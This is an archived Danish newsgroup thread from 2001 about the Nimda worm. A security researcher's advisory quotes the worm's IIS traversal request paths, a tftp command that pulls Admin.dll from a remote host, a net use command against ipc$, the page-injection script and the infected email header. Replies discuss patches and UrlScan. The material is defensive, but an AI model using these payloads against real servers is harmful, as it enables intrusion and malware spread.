/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Opdateret: Alvorlig orm i omløb
Fra : Peter Kruse


Dato : 18-09-01 18:58

Navn: W32.Nimda.worm
Risiko: HØJ
Oprindelse: ?

W32.Nimda.worm er en høj risiko virus der spreder sig ved at udnytte en
sårbarhed i Outlook/IE (IFrame ) og adskillige andre som omfatter IIS. Denne
orm er krydsinficerende og udnytter stort set samtlige kendte sårbarheder,
som kan afvikle (remotely) kode på Microsoft IIS 4.0 og 5.0 (den laver alle
tænke GET kommandoer). Derudover spreder den sig fra inficerede hjemmesider
via Iframe sårbarheden, som tillader at kode afvikles automatisk uden
interaktion fra brugeren hvis maskinen ikke er opdateret eller understøtter
active scripting. Ormen tilføjer følgende streng til hjemmesider som
kompromitteres: "<html><script
language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>". Vi tæller allerede nu
adskillige hundrede danske hjemmesider.

Inficerede PC'ere og servere scanner efter infektion efter andre systemer
der kan infiltreres ved at udnytte gamle og nye sårbarheder. Her findes en
liste over de kald som ormen laver mod andre hosts i håb om at finde en
sårbar IIS-server.

tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..

Ormen indeholder teksten: "Concept Virus(CV) V.5, Copyright(C)2001
R.P.China". Det er højest sandsynligt, at den udspringer fra andre kilder
end den indlysende signatur.

Fra private PC'ere sender den sig selv videre til samtlige fortegnelser i
Outlooks adressekartotek ligesom den spreder sig via Netværk shares. Det
sker via SMB/CIFS som "C$" hvor den tilføjer en Guest konto til den lokale
administrator gruppe. På hver enkelt delt mappe den finder droppes følgende
filer: sample.nws, sample.eml, desktop.eml, desktop.nws.

Den dropper derudover mindst 4 filer i mappen:
(root)\Program Files\Common Files\msadc\
root.exe, TFTP129.exe, TFTP68.exe, TFTP192.exe.

Ormen syntes, at være primært bærende via email hvor den automatisk afvikles
hvis den vises i "preview pane" i Outlook/OE på en maskine som ikke er
opdateret med patch fra Microsoft..En inficeret email vil (den kan også være
blank i emne og indhold men vil altid anvende samme filnavn) ankomme med
følgende header:

Emne:
Xdesktopdesktopdesktopdesktopsamplesampledesktopsamplesamplesamplesampledesk
topdesktopsamplesampledesktopsamplesampledesktopdesktopsamplesamplesample
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

For at udgå at blive inficeret af denne orm kan man deaktivere aktive
scripting. Det kan gøres på følgende måde:

Højreklik på IE ikonet, vælg egenskaber, klik på fanebladet sikkerhed og
herunder brugerdefineret niveau. Gå ned på listen og deaktiver aktive
scripting.
Alle som administrerer en IIS server skal snarest opdatere med en samling af
patches, som er frigivet af Microsoft og som kan hentes på følgende adresse:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Yderligere informationer om den sårbarhed, som ormen anvender til at sprede
sig via email og fra kompromitterede hjemmesider kan findes hos Georgi
Guninski på adressen: http://www.guninski.com/frame2-desc.html

Med venlig hilsen / Best regards
Peter Kruse
Security- and virusresearch
Telia Telecom / Telia Security Group
Søren Frichsvej 34C - DK 8230 Åbyhøj



 
 
Bertel Lund Hansen (18-09-2001)
Kommentar
Fra : Bertel Lund Hansen


Dato : 18-09-01 19:13

Peter Kruse skrev:

>Ormen indeholder teksten: "Concept Virus(CV) V.5, Copyright(C)2001
>R.P.China". Det er højest sandsynligt, at den udspringer fra andre kilder
>end den indlysende signatur.

Der var én i en gruppe der bemærkede at den er sluppet fri
rimelig præcist en uge efter angrebet på de to tårne.

--
Bertel
http://lundhansen.dk/bertel/   FIDUSO: http://fiduso.dk/

Lasse Reichstein Nie~ (19-09-2001)
Kommentar
Fra : Lasse Reichstein Nie~


Dato : 19-09-01 11:28

Bertel Lund Hansen <nospamto@lundhansen.dk> writes:

> Der var én i en gruppe der bemærkede at den er sluppet fri
> rimelig præcist en uge efter angrebet på de to tårne.

Samme person ville nok have sagt det samme hvis den var sluppet ud
rimeligt præcist 42 dage efter, eller et andet "magiskt" tal.
Alting sker rimeligt præcist et antal dage efter noget andet :)
/L
--
Lasse Reichstein Nielsen - lrn@daimi.au.dk
This message may be reproduced freely for non commercial purposes.
"... but where do you want to go tomorrow?"

Claus Rasmussen (18-09-2001)
Kommentar
Fra : Claus Rasmussen


Dato : 18-09-01 20:21

Peter Kruse wrote:

> Navn: W32.Nimda.worm

Så vidt jeg læser dette, så vil et helt firma være inficeret, bare een
medarbejder ikke har fået opdateret sin maskine og modtager ormen/virussen
pr email. Er det rigtigt ? I så fald er den rimeligt led, må man sige.

Den er også temmeligt aktiv: På bare en 4-5 timer har den allerede over-
gået CodeRed II, da den var værst.

-Claus



Peder Vendelbo Mikke~ (19-09-2001)
Kommentar
Fra : Peder Vendelbo Mikke~


Dato : 19-09-01 00:51

"Peter Kruse" skrev

> Navn: W32.Nimda.worm

Ormen kan tages med MS værktøjet UrlScan (ISAPI filter):

<URL: http://www.microsoft.com/technet/security/urlscan.asp >

Det er en vældig god ide, at læse hvad der står i den medfølgende
tekst-fil og de afsluttende bemærkninger under installationen (så man
ved hvor tekstfilen kan findes).

BEMÆRK at webservicen skal genstartes, det sker dog automatisk, for
at indlæse ISAPI filteret.

Der er temmelig heftig aktivitet, på 10 minutter lavede den en 20 KB
logfil.

> readme.eml

Bemærk at *.eml er Outlook Express 5 format, når man gemmer en email
og *.nws er formatet når man gemmer et indlæg fra en nyhedsgruppe.
Disse formater benyttes for at omgå diverse sikkerhedsindstillinger i
Internet Explorer.

Yderligere oplysninger kan findes bl.a. her:

<URL: http://www.cert.org/current/current_activity.html#port80 >
<URL: http://www.kb.cert.org/vuls/id/111677 >

Med venlig hilsen

Peder


John Hinge (19-09-2001)
Kommentar
Fra : John Hinge


Dato : 19-09-01 12:31

Peder Vendelbo Mikkelsen wrote:
>
> > readme.eml
>
> Bemærk at *.eml er Outlook Express 5 format, når man gemmer en email
> og *.nws er formatet når man gemmer et indlæg fra en nyhedsgruppe.
> Disse formater benyttes for at omgå diverse sikkerhedsindstillinger i
> Internet Explorer.
>
Jeg har for en gangs skyld måttet tage yderligere beskyttelse i
brug netop fordi tidlige rapporter antyder at ormen kan inficere
via Outlook, selvom man har den sat til at være paranoid og
spørge pænt før den åbner attachments.
Så nu kigger min mailserver på attachments og hvis den finder en
readme.exe så fjerner den alle atachments og sender mig en
besked om den har gjort det.

At der så (endnu) ikke er nogen som har prøvet at sende mig
en Nimda orm via email endnu er så hvad det er.

I forvejen fanger min internet udbyder web delen af det,
så min OmniHTTPd server får ikke engang lov til at sige
404 not found

--
John Hinge - shayera / .sPOOn.
On usenet I represent no one but myself.
"Buffy I love you...... Oh God No!" Spike, Buffy tVs
http://www.spoon-demogroup.net

H. Olesen (19-09-2001)
Kommentar
Fra : H. Olesen


Dato : 19-09-01 14:51

On Tue, 18 Sep 2001 19:58:02 +0200, "Peter Kruse" <Peter.kruse@it.dk>
wrote:

> Derudover spreder den sig fra inficerede hjemmesider
>via Iframe sårbarheden, som tillader at kode afvikles automatisk uden
>interaktion fra brugeren hvis maskinen ikke er opdateret eller understøtter
>active scripting. Ormen tilføjer følgende streng til hjemmesider som
>kompromitteres: "<html><script
>language="JavaScript">window.open("readme.eml", null,
>"resizable=no,top=6000,left=6000")</script></html>". Vi tæller allerede nu
>adskillige hundrede danske hjemmesider.

Ved godt jeg er dum, men håber at I kan hjælpe mig med at blive
klogere.

Hvordan bliver hjemmesiderne inficerede i første omgang?

--
Mvh.
H. Olesen
Ved mail, fjern ordet "fjern" fra min email adresse

Alex Holst (19-09-2001)
Kommentar
Fra : Alex Holst


Dato : 19-09-01 15:12

H Olesen <helle@fjernhavesiden.dk> wrote:
> Hvordan bliver hjemmesiderne inficerede i første omgang?

Nimba benytter sig af fejl i Microsoft's Internet Information Server. Fejl
som har vaeret kendte i et stykke tid.

Jeg gad vide hvor mange orme der skal til foer folk patcher deres maskiner
hver gang en sikkerhedsfejl bliver fundet -- og hvor lang tid der gaar foer
folk bliver dovne igen.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.area51.dk/


H. Olesen (19-09-2001)
Kommentar
Fra : H. Olesen


Dato : 19-09-01 15:19

On Wed, 19 Sep 2001 16:11:54 +0200, Alex Holst <a@area51.dk> wrote:

>H Olesen <helle@fjernhavesiden.dk> wrote:
>> Hvordan bliver hjemmesiderne inficerede i første omgang?
>
>Nimba benytter sig af fejl i Microsoft's Internet Information Server. Fejl
>som har vaeret kendte i et stykke tid.

Hmmm, jeg forstår det stadig ikke. Vil det sige at den går på serveren
som hjemmesiden ligger på og derfra ud til hjemmesiderne?

--
Mvh.
H. Olesen
Ved mail, fjern ordet "fjern" fra min email adresse

Aagaard (19-09-2001)
Kommentar
Fra : Aagaard


Dato : 19-09-01 18:56

"H. Olesen" <helle@fjernhavesiden.dk> skrev i en meddelelse
news:q6ahqtogmod0ok4lnp20v4r84mnkf0d8ij@4ax.com...
> On Wed, 19 Sep 2001 16:11:54 +0200, Alex Holst <a@area51.dk> wrote:
>
> Hmmm, jeg forstår det stadig ikke. Vil det sige at den går på serveren
> som hjemmesiden ligger på og derfra ud til hjemmesiderne?
>
> H. Olesen

Det kan læses hos Symantec:

Citat
Specifically, the worm attempts to use root.exe or cmd.exe which has been
placed in a remote executable directory to upload itself as admin.dll. The
worm then attempts to modify .htm, .html., and .asp files on the local drive
with JavaScript that causes readme.eml, which is created by the virus to be
loaded by Internet Explorer and Outlook Express. This file contains the worm
as an attachment, which may be executed without detaching or running the
attachment.


Læs hele historien:
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

Med venlig hilsen
Aagaard
--
http://ditte-marie.dk - Vores dejlige baby
http://ditte-marie.dk/fotoalbum/index.php - Foto til kritik
http://ditte-marie.dk/billedkomprimering/ - Om jpeg kvalitet



Bertel Lund Hansen (19-09-2001)
Kommentar
Fra : Bertel Lund Hansen


Dato : 19-09-01 16:03

Alex Holst skrev:

>Jeg gad vide hvor mange orme der skal til foer folk patcher deres maskiner
>hver gang en sikkerhedsfejl bliver fundet -- og hvor lang tid der gaar foer
>folk bliver dovne igen.

Mellem Happy.exe og Melissa gik der mindre end en måned. De var
dog rettet mod 'almindelige' systemer, men i dag er NT vel snart
også et almindeligt system.

--
Bertel
http://lundhansen.dk/bertel/   FIDUSO: http://fiduso.dk/

Flemming Riis (19-09-2001)
Kommentar
Fra : Flemming Riis


Dato : 19-09-01 19:59

"Alex Holst" <a@area51.dk> wrote in message
news:slrn9qh9ta.2ahd.a@C-Tower.Area51.DK

> Jeg gad vide hvor mange orme der skal til foer folk patcher deres maskiner
> hver gang en sikkerhedsfejl bliver fundet -- og hvor lang tid der gaar
foer
> folk bliver dovne igen.

Når man er blevet ramt en gang eller man har lovet ledelsen man har styr på
sine servere.



Søg
Reklame
Statistik
Spørgsmål : 177552
Tips : 31968
Nyheder : 719565
Indlæg : 6408849
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste